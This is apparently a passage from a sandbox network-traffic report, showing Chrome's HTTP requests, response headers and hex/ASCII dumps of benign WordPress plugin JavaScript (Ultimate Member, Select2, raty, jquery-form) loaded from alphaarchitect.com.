                                                                                                                                                                                                                                                                        2024-12-20 12:44:54 UTC1369INData Raw: 22 29 29 2c 6a 51 75 65 72 79 28 22 2e 75 6d 2d 73 69 6e 67 6c 65 2d 66 69 6c 65 2d 70 72 65 76 69 65 77 5b 64 61 74 61 2d 6b 65 79 3d 22 2b 65 2b 22 5d 22 29 2e 70 61 72 65 6e 74 73 28 22 2e 75 6d 2d 66 69 65 6c 64 22 29 2e 66 69 6e 64 28 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 68 69 64 64 65 6e 22 5d 27 29 2e 76 61 6c 28 61 29 7d 29 2c 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 29 2e 6f 6e 28 22 63 6c 69 63 6b 22 2c 22 2e 75 6d 2d 66 69 6e 69 73 68 2d 75 70 6c 6f 61 64 2e 69 6d 61 67 65 3a 6e 6f 74 28 2e 64 69 73 61 62 6c 65 64 29 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 2c 65 2c 74 3d 6a 51 75 65 72 79 28 74 68 69 73 29 2c 69 3d 6a 51 75 65 72 79 28 74 68 69 73 29 2e 61 74 74 72 28 22 64 61 74 61 2d 6b 65 79 22 29 2c 72 3d 6a 51 75 65 72
                                                                                                                                                                                                                                                                        Data Ascii: ")),jQuery(".um-single-file-preview[data-key="+e+"]").parents(".um-field").find('input[type="hidden"]').val(a)}),jQuery(document).on("click",".um-finish-upload.image:not(.disabled)",function(){var a,e,t=jQuery(this),i=jQuery(this).attr("data-key"),r=jQuer
                                                                                                                                                                                                                                                                        2024-12-20 12:44:54 UTC1369INData Raw: 65 2e 73 6f 75 72 63 65 5f 75 72 6c 2b 22 3f 22 2b 61 2e 67 65 74 54 69 6d 65 28 29 2b 27 22 20 61 6c 74 3d 22 22 20 2f 3e 27 29 2c 6a 51 75 65 72 79 28 22 2e 75 6d 22 29 2e 68 61 73 43 6c 61 73 73 28 22 75 6d 2d 65 64 69 74 69 6e 67 22 29 29 26 26 6a 51 75 65 72 79 28 22 2e 75 6d 2d 63 6f 76 65 72 2d 6f 76 65 72 6c 61 79 22 29 2e 73 68 6f 77 28 29 2c 6a 51 75 65 72 79 28 22 2e 75 6d 2d 73 69 6e 67 6c 65 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 5b 64 61 74 61 2d 6b 65 79 3d 22 2b 69 2b 22 5d 22 29 2e 66 61 64 65 49 6e 28 29 2e 66 69 6e 64 28 22 69 6d 67 22 29 2e 61 74 74 72 28 22 73 72 63 22 2c 65 2e 64 61 74 61 2e 69 6d 61 67 65 2e 73 6f 75 72 63 65 5f 75 72 6c 2b 22 3f 22 2b 61 2e 67 65 74 54 69 6d 65 28 29 29 2c 75 6d 5f 72 65 6d 6f 76 65 5f 6d 6f 64
                                                                                                                                                                                                                                                                        Data Ascii: e.source_url+"?"+a.getTime()+'" alt="" />'),jQuery(".um").hasClass("um-editing"))&&jQuery(".um-cover-overlay").show(),jQuery(".um-single-image-preview[data-key="+i+"]").fadeIn().find("img").attr("src",e.data.image.source_url+"?"+a.getTime()),um_remove_mod
                                                                                                                                                                                                                                                                        2024-12-20 12:44:54 UTC517INData Raw: 65 72 79 28 74 68 69 73 29 2e 70 61 72 65 6e 74 73 28 22 2e 75 6d 2d 70 72 6f 66 69 6c 65 2d 70 68 6f 74 6f 22 29 2e 61 74 74 72 28 22 64 61 74 61 2d 75 73 65 72 5f 69 64 22 29 29 2c 6a 51 75 65 72 79 28 74 68 69 73 29 2e 70 61 72 65 6e 74 73 28 22 2e 75 6d 2d 63 6f 76 65 72 22 29 2e 61 74 74 72 28 22 64 61 74 61 2d 72 61 74 69 6f 22 29 26 26 6a 51 75 65 72 79 28 22 23 22 2b 61 29 2e 61 74 74 72 28 22 64 61 74 61 2d 72 61 74 69 6f 22 2c 6a 51 75 65 72 79 28 74 68 69 73 29 2e 70 61 72 65 6e 74 73 28 22 2e 75 6d 2d 63 6f 76 65 72 22 29 2e 61 74 74 72 28 22 64 61 74 61 2d 72 61 74 69 6f 22 29 29 2c 6a 51 75 65 72 79 28 74 68 69 73 29 2e 70 61 72 65 6e 74 73 28 22 2e 75 6d 2d 63 6f 76 65 72 22 29 2e 61 74 74 72 28 22 64 61 74 61 2d 75 73 65 72 5f 69 64 22 29
                                                                                                                                                                                                                                                                        Data Ascii: ery(this).parents(".um-profile-photo").attr("data-user_id")),jQuery(this).parents(".um-cover").attr("data-ratio")&&jQuery("#"+a).attr("data-ratio",jQuery(this).parents(".um-cover").attr("data-ratio")),jQuery(this).parents(".um-cover").attr("data-user_id")
                                                                                                                                                                                                                                                                        2024-12-20 12:44:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        76192.168.2.449834141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:55 UTC826OUTGET /wp-content/cache/min/1/wp-content/plugins/ultimate-member/assets/libs/select2/i18n/en.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:55 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:55 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-34a"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147812
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9fd88b33308-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:55 UTC849INData Raw: 33 34 61 0d 0a 2f 2a 21 20 53 65 6c 65 63 74 32 20 34 2e 30 2e 31 33 20 7c 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 73 65 6c 65 63 74 32 2f 73 65 6c 65 63 74 32 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 2e 6d 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6a 51 75 65 72 79 26 26 6a 51 75 65 72 79 2e 66 6e 26 26 6a 51 75 65 72 79 2e 66 6e 2e 73 65 6c 65 63 74 32 26 26 6a 51 75 65 72 79 2e 66 6e 2e 73 65 6c 65 63 74 32 2e 61 6d 64 29 76 61 72 20 65 3d 6a 51 75 65 72 79 2e 66 6e 2e 73 65 6c 65 63 74 32 2e 61 6d 64 3b 65 2e 64 65 66 69 6e 65 28 22 73 65 6c 65 63 74 32 2f 69 31 38 6e 2f 65 6e 22 2c 5b 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 65 72 72 6f 72 4c 6f 61 64 69 6e 67 3a 66 75 6e 63
                                                                                                                                                                                                                                                                        Data Ascii: 34a/*! Select2 4.0.13 | https://github.com/select2/select2/blob/master/LICENSE.md */!function(){if(jQuery&&jQuery.fn&&jQuery.fn.select2&&jQuery.fn.select2.amd)var e=jQuery.fn.select2.amd;e.define("select2/i18n/en",[],function(){return{errorLoading:func
                                                                                                                                                                                                                                                                        2024-12-20 12:44:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        77192.168.2.449835141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:55 UTC799OUTGET /wp-content/plugins/ultimate-member/assets/libs/raty/um-raty.min.js?ver=2.6.0 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:55 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:55 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Fri, 15 Nov 2024 17:23:51 GMT
                                                                                                                                                                                                                                                                        ETag: W/"673783a7-238f"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147812
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9fd9a15c466-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:55 UTC877INData Raw: 32 33 38 66 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 69 29 7b 76 61 72 20 72 3d 7b 69 6e 69 74 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 73 65 6c 66 3d 69 28 74 68 69 73 29 2c 72 2e 64 65 73 74 72 6f 79 2e 63 61 6c 6c 28 74 68 69 73 2e 73 65 6c 66 29 2c 74 68 69 73 2e 6f 70 74 3d 69 2e 65 78 74 65 6e 64 28 21 30 2c 7b 7d 2c 69 2e 66 6e 2e 75 6d 5f 72 61 74 79 2e 64 65 66 61 75 6c 74 73 2c 74 29 2c 72 2e 5f 61 64 6a 75 73 74 43 61 6c 6c 62 61 63 6b 2e 63 61 6c 6c 28 74 68 69 73 29 2c 72 2e 5f 61 64 6a 75 73 74 4e 75 6d 62 65 72 2e 63 61 6c 6c 28 74 68 69 73 29 2c 22 69 6d 67 22 21 3d 3d 74 68 69 73 2e 6f 70 74 2e 73 74 61 72 54 79 70 65 26 26 72 2e 5f 61 64 6a 75 73
                                                                                                                                                                                                                                                                        Data Ascii: 238f!function(i){var r={init:function(t){return this.each(function(){this.self=i(this),r.destroy.call(this.self),this.opt=i.extend(!0,{},i.fn.um_raty.defaults,t),r._adjustCallback.call(this),r._adjustNumber.call(this),"img"!==this.opt.starType&&r._adjus
                                                                                                                                                                                                                                                                        2024-12-20 12:44:55 UTC1369INData Raw: 6f 70 74 2e 6e 75 6d 62 65 72 2c 31 2c 74 68 69 73 2e 6f 70 74 2e 6e 75 6d 62 65 72 4d 61 78 29 7d 2c 5f 61 64 6a 75 73 74 50 61 74 68 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 6f 70 74 2e 70 61 74 68 3d 74 68 69 73 2e 6f 70 74 2e 70 61 74 68 7c 7c 22 22 2c 74 68 69 73 2e 6f 70 74 2e 70 61 74 68 26 26 22 2f 22 21 3d 3d 74 68 69 73 2e 6f 70 74 2e 70 61 74 68 2e 63 68 61 72 41 74 28 74 68 69 73 2e 6f 70 74 2e 70 61 74 68 2e 6c 65 6e 67 74 68 2d 31 29 26 26 28 74 68 69 73 2e 6f 70 74 2e 70 61 74 68 2b 3d 22 2f 22 29 7d 2c 5f 61 64 6a 75 73 74 50 72 65 63 69 73 69 6f 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 6f 70 74 2e 68 61 6c 66 3d 21 30 2c 74 68 69 73 2e 6f 70 74 2e 74 61 72 67 65 74 54 79 70 65 3d 22 73 63 6f 72 65 22 7d 2c 5f 61 64
                                                                                                                                                                                                                                                                        Data Ascii: opt.number,1,this.opt.numberMax)},_adjustPath:function(){this.opt.path=this.opt.path||"",this.opt.path&&"/"!==this.opt.path.charAt(this.opt.path.length-1)&&(this.opt.path+="/")},_adjustPrecision:function(){this.opt.half=!0,this.opt.targetType="score"},_ad
                                                                                                                                                                                                                                                                        2024-12-20 12:44:55 UTC1369INData Raw: 28 61 2c 65 2c 74 29 7d 29 7d 2c 5f 62 69 6e 64 4f 75 74 43 61 6e 63 65 6c 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 74 68 69 73 3b 61 2e 63 61 6e 63 65 6c 2e 6f 6e 28 22 6d 6f 75 73 65 6c 65 61 76 65 2e 75 6d 5f 72 61 74 79 22 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 61 2e 6f 70 74 2e 63 61 6e 63 65 6c 4f 66 66 3b 22 69 6d 67 22 21 3d 3d 61 2e 6f 70 74 2e 73 74 61 72 54 79 70 65 26 26 28 65 3d 61 2e 6f 70 74 2e 63 61 6e 63 65 6c 43 6c 61 73 73 2b 22 20 22 2b 65 29 2c 72 2e 5f 73 65 74 49 63 6f 6e 2e 63 61 6c 6c 28 61 2c 74 68 69 73 2c 65 29 2c 61 2e 6f 70 74 2e 6d 6f 75 73 65 6f 75 74 26 26 28 65 3d 2b 61 2e 73 63 6f 72 65 2e 76 61 6c 28 29 7c 7c 76 6f 69 64 20 30 2c 61 2e 6f 70 74 2e 6d 6f 75 73 65 6f 75 74 2e 63 61 6c 6c 28
                                                                                                                                                                                                                                                                        Data Ascii: (a,e,t)})},_bindOutCancel:function(){var a=this;a.cancel.on("mouseleave.um_raty",function(t){var e=a.opt.cancelOff;"img"!==a.opt.starType&&(e=a.opt.cancelClass+" "+e),r._setIcon.call(a,this,e),a.opt.mouseout&&(e=+a.score.val()||void 0,a.opt.mouseout.call(
                                                                                                                                                                                                                                                                        2024-12-20 12:44:55 UTC1369INData Raw: 72 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 69 28 74 68 69 73 2e 6f 70 74 2e 74 61 72 67 65 74 53 63 6f 72 65 29 3b 74 68 69 73 2e 73 63 6f 72 65 3d 74 2e 6c 65 6e 67 74 68 3f 74 3a 72 2e 5f 62 75 69 6c 64 53 63 6f 72 65 46 69 65 6c 64 2e 63 61 6c 6c 28 74 68 69 73 29 7d 2c 5f 63 72 65 61 74 65 53 74 61 72 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 31 3b 74 3c 3d 74 68 69 73 2e 6f 70 74 2e 6e 75 6d 62 65 72 3b 74 2b 2b 29 7b 76 61 72 20 65 3d 72 2e 5f 6e 61 6d 65 46 6f 72 49 6e 64 65 78 2e 63 61 6c 6c 28 74 68 69 73 2c 74 29 2c 65 3d 7b 61 6c 74 3a 74 2c 73 72 63 3a 74 68 69 73 2e 6f 70 74 2e 70 61 74 68 2b 74 68 69 73 2e 6f 70 74 5b 65 5d 7d 3b 28 65 3d 22 69 6d 67 22 21 3d 3d 74 68 69 73 2e 6f 70 74 2e 73 74 61
                                                                                                                                                                                                                                                                        Data Ascii: re:function(){var t=i(this.opt.targetScore);this.score=t.length?t:r._buildScoreField.call(this)},_createStars:function(){for(var t=1;t<=this.opt.number;t++){var e=r._nameForIndex.call(this,t),e={alt:t,src:this.opt.path+this.opt[e]};(e="img"!==this.opt.sta
                                                                                                                                                                                                                                                                        2024-12-20 12:44:55 UTC1369INData Raw: 29 2c 74 7d 2c 5f 74 75 72 6e 4f 6e 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 6f 70 74 2e 73 69 6e 67 6c 65 3f 74 3d 3d 3d 65 3a 74 3c 3d 65 7d 2c 5f 67 65 74 48 69 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 6f 70 74 2e 68 69 6e 74 73 5b 74 2d 31 5d 3b 72 65 74 75 72 6e 22 22 3d 3d 3d 65 3f 22 22 3a 65 7c 7c 74 7d 2c 5f 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 70 61 72 73 65 49 6e 74 28 74 68 69 73 2e 73 63 6f 72 65 2e 76 61 6c 28 29 2c 31 30 29 2c 74 3d 74 3f 72 2e 5f 67 65 74 48 69 6e 74 2e 63 61 6c 6c 28 74 68 69 73 2c 74 29 3a 74 68 69 73 2e 6f 70 74 2e 6e 6f 52 61 74 65 64 4d 73 67 3b 74 68 69 73 2e 73 74 79 6c 65 2e 63 75 72 73 6f 72 3d 22 22 2c 74 68
                                                                                                                                                                                                                                                                        Data Ascii: ),t},_turnOn:function(t,e){return this.opt.single?t===e:t<=e},_getHint:function(t){var e=this.opt.hints[t-1];return""===e?"":e||t},_lock:function(){var t=parseInt(this.score.val(),10),t=t?r._getHint.call(this,t):this.opt.noRatedMsg;this.style.cursor="",th
                                                                                                                                                                                                                                                                        2024-12-20 12:44:55 UTC1369INData Raw: 5f 73 65 74 54 61 72 67 65 74 2e 63 61 6c 6c 28 74 68 69 73 2c 61 2c 74 29 29 7d 2c 5f 75 6e 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 73 74 79 6c 65 2e 63 75 72 73 6f 72 3d 22 70 6f 69 6e 74 65 72 22 2c 74 68 69 73 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 28 22 74 69 74 6c 65 22 29 2c 74 68 69 73 2e 73 63 6f 72 65 2e 72 65 6d 6f 76 65 41 74 74 72 28 22 72 65 61 64 6f 6e 6c 79 22 29 2c 74 68 69 73 2e 73 65 6c 66 2e 64 61 74 61 28 22 72 65 61 64 6f 6e 6c 79 22 2c 21 31 29 3b 66 6f 72 28 76 61 72 20 74 3d 30 3b 74 3c 74 68 69 73 2e 6f 70 74 2e 6e 75 6d 62 65 72 3b 74 2b 2b 29 74 68 69 73 2e 73 74 61 72 73 5b 74 5d 2e 74 69 74 6c 65 3d 72 2e 5f 67 65 74 48 69 6e 74 2e 63 61 6c 6c 28 74 68 69 73 2c 74 2b 31 29 3b 74 68 69 73 2e 63
                                                                                                                                                                                                                                                                        Data Ascii: _setTarget.call(this,a,t))},_unlock:function(){this.style.cursor="pointer",this.removeAttribute("title"),this.score.removeAttr("readonly"),this.self.data("readonly",!1);for(var t=0;t<this.opt.number;t++)this.stars[t].title=r._getHint.call(this,t+1);this.c
                                                                                                                                                                                                                                                                        2024-12-20 12:44:55 UTC1369INData Raw: 22 29 2c 72 2e 5f 6c 6f 63 6b 29 3a 28 72 2e 5f 62 69 6e 64 73 2e 63 61 6c 6c 28 74 68 69 73 29 2c 72 2e 5f 75 6e 6c 6f 63 6b 29 29 2e 63 61 6c 6c 28 74 68 69 73 29 2c 74 2e 64 61 74 61 28 22 72 65 61 64 6f 6e 6c 79 22 2c 65 29 29 7d 29 7d 2c 72 65 6c 6f 61 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 2e 73 65 74 2e 63 61 6c 6c 28 74 68 69 73 2c 7b 7d 29 7d 2c 73 63 6f 72 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 69 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3f 72 2e 73 65 74 53 63 6f 72 65 2e 61 70 70 6c 79 28 74 2c 61 72 67 75 6d 65 6e 74 73 29 3a 72 2e 67 65 74 53 63 6f 72 65 2e 63 61 6c 6c 28 74 29 7d 2c 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20
                                                                                                                                                                                                                                                                        Data Ascii: "),r._lock):(r._binds.call(this),r._unlock)).call(this),t.data("readonly",e))})},reload:function(){return r.set.call(this,{})},score:function(){var t=i(this);return arguments.length?r.setScore.apply(t,arguments):r.getScore.call(t)},set:function(a){return
                                                                                                                                                                                                                                                                        2024-12-20 12:44:55 UTC20INData Raw: 3a 22 68 69 6e 74 22 7d 7d 28 6a 51 75 65 72 79 29 3b 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: :"hint"}}(jQuery);
                                                                                                                                                                                                                                                                        2024-12-20 12:44:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        78192.168.2.449837141.193.213.114435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:55 UTC596OUTGET /wp-content/plugins/ultimate-member/assets/libs/jquery-form/jquery-form.min.js?ver=2.9.1 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:55 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:55 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Fri, 15 Nov 2024 17:23:51 GMT
                                                                                                                                                                                                                                                                        ETag: W/"673783a7-3874"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147812
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9fdab257ca0-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:55 UTC877INData Raw: 33 38 37 34 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 6a 71 75 65 72 79 22 5d 2c 65 29 3a 65 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6a 51 75 65 72 79 3f 6a 51 75 65 72 79 3a 77 69 6e 64 6f 77 2e 5a 65 70 74 6f 29 7d 28 66 75 6e 63 74 69 6f 6e 28 4c 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 68 3d 7b 7d 2c 74 3d 28 68 2e 66 69 6c 65 61 70 69 3d 76 6f 69 64 20 30 21 3d 3d 4c 28 22 3c 69 6e 70 75 74 20 74 79 70 65 3d 27 66 69 6c 65 27 2f 3e 22 29 2e 67 65 74 28 30 29 2e 66 69 6c 65 73 2c 68 2e 66 6f 72 6d 64 61 74 61 3d 76 6f 69 64 20 30 21
                                                                                                                                                                                                                                                                        Data Ascii: 3874!function(e){"use strict";"function"==typeof define&&define.amd?define(["jquery"],e):e("undefined"!=typeof jQuery?jQuery:window.Zepto)}(function(L){"use strict";var h={},t=(h.fileapi=void 0!==L("<input type='file'/>").get(0).files,h.formdata=void 0!
                                                                                                                                                                                                                                                                        2024-12-20 12:44:55 UTC1369INData Raw: 66 6f 72 6d 5d 20 22 2b 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 6a 6f 69 6e 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 2c 22 22 29 2c 77 69 6e 64 6f 77 2e 63 6f 6e 73 6f 6c 65 26 26 77 69 6e 64 6f 77 2e 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 3f 77 69 6e 64 6f 77 2e 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 65 29 3a 77 69 6e 64 6f 77 2e 6f 70 65 72 61 26 26 77 69 6e 64 6f 77 2e 6f 70 65 72 61 2e 70 6f 73 74 45 72 72 6f 72 26 26 77 69 6e 64 6f 77 2e 6f 70 65 72 61 2e 70 6f 73 74 45 72 72 6f 72 28 65 29 29 7d 4c 2e 66 6e 2e 61 74 74 72 32 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3b 72 65 74 75 72 6e 20 74 26 26 28 28 65 3d 74 68 69 73 2e 70 72 6f 70 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 29 26 26 65 2e 6a 71 75 65 72 79 7c
                                                                                                                                                                                                                                                                        Data Ascii: form] "+Array.prototype.join.call(arguments,""),window.console&&window.console.log?window.console.log(e):window.opera&&window.opera.postError&&window.opera.postError(e))}L.fn.attr2=function(){var e;return t&&((e=this.prop.apply(this,arguments))&&e.jquery|
